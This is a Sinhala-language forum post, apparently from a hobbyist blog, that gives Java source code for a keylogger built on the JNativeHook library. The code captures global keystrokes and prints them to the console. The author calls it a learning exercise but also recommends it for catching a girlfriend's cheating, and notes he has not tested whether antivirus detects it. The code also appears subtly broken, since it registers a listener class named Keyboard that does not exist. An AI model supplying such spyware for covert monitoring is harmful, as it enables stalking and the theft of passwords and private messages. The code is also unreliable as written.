මචන්ලා අද මම කියල දෙන්න යන්නේ ජාවා උපයෝගී කරගෙන සරල Keylogger එකක් හදන්නේ කොහොමද කියල.මේක නරක දේවල් වලට නැතුව ඉගෙන ගන්න දෙයක් විදිහට තමන්ගේ දැනුමට එකතු කරගන්න යොදාගන්න.
මුලින්ම අපි බලමු මොකක්ද මේ Keylogger එකක් කියන්නේ කියල.සරලව කියනවනම් , Keylogger එකක් කියන්නේ අපේ පරිගණකයේ අපි keyboard එකෙන් ඇතුලත් කරන දත්ත(characters) මොනාද කියල සටහන් කරගන්න එක සහ , ඒ සටහන් කරගත්ත දත්ත පිටස්තර පුද්ගලයන්ට ලබාදෙන program එකක්.මේ වගේ ඒවා ගොඩක් වෙලාවට යොදාගන්නේ hackerලා.
ඒ වගේම , ගොඩක් අය දන්නවා ඇති ජාවා program එකක් වැඩ කරන්නේ virtual environment එකක් ඇතුලේ කියල.එක නිසා ගොඩක් වෙලාවට windows වගේ මෙහෙයුම් පද්දති සම්බන්ද දේවල් වලට කෙලින්ම ඇගිලි ගහන්න ජාවා වලට හැකියාවක් නැහැ.නමුත් අපිට පුළුවන් c හෝ c++ වලින් නිර්මාණය කරපු API ජාවා සමග භාවිතා කරලා ප්‍රධාන මෙහෙයුම් පද්දතිය සමග සම්බන්දතා ඇති කරගන්න.
මම මේ පෙන්නන්න යන program එකත් වැඩ කරන්නේ එහෙම හදපු ජාවා API එකක් උපයෝගී කරගෙනයි.මම මුලික සිද්දාන්තය වැඩ කරන හැටි program එකක් විදිහට පෙන්නන්නම්.ඉතුරු ටික ඔයාල තනියම තමන්ට කැමති විදිහට වෙනස් කරගන්න.
ඒ වගේම නැවත වතාවක් මම කියන්නේ , මම මේ කියල දෙන දේ වැරදි වැඩ වලට උපයෝගී කරගන්න එපා.ඒ නිසාම තමයි මම මුලික දේ විතරක් කියල දෙන්නේ.
හරි අපිට මේ වැඩේ කරන්න මුලික වශයෙන් අවශ්‍ය වෙන්නේ JNativeHook කියන API එක.
මේ API එක අපිට අන්තර්ජාලය මගින් බාගත කරගන්න පුළුවන්.
ඊට පස්සේ අපි බලමු program එක කොහොමද කියල.
import org.jnativehook.GlobalScreen;
import org.jnativehook.keyboard.NativeKeyEvent;
import org.jnativehook.keyboard.NativeKeyListener;
public class Keylogger implements NativeKeyListener {
public static void main(String[] args) {
try {
GlobalScreen.registerNativeHook();
} catch (Exception e) {
System.out.println("Error :" + e);
}
GlobalScreen.getInstance().addNativeKeyListener(new Keyboard());
}
@Override
public void nativeKeyPressed(NativeKeyEvent e) {
System.out.println(NativeKeyEvent.getKeyText(e.getKeyCode()));
}
@Override
public void nativeKeyReleased(NativeKeyEvent e) {
}
@Override
public void nativeKeyTyped(NativeKeyEvent e) {
}
}
ඔය උඩ තියෙන program එක භාවිත කරලා අපිට පුළුවන් අපි පරිඝනකයේ ඕනෑම තැනක type කරන characters මොනාද කියල සටහන් කරගන්න.පහල වීඩියෝ එක මගින් ඔයාලට දල අදහසක් ගන්න පුළුවන් වෙයි.
තව දෙයක් තමයි , මේ program එක වැඩකරන්න නම් , මේ ප්රෝරම් එක දාල තියෙන පරිගණකයේ ජාවා install කරලා තියෙන්න ඕනේ.
තව දෙයක් තමයි , මේ program එක virus guards වලින් detect කරනවද කියල මම තාම check කරලනම් නැහැ.
මේක හොදයි ඉතින් කෙල්ලගේ හොර අල්ලනවා වගේ වැඩ වලට.
මගේ බ්ලොග් එකට.
මම එහෙනම් පස්සේ දවසක තවත් ත්‍රෙඩ් එකකින් හම්බ වෙන්නම්. එතකන් කට්ටියටම ජයෙන් ජය.
Last edited:



rep denna baalu danma ..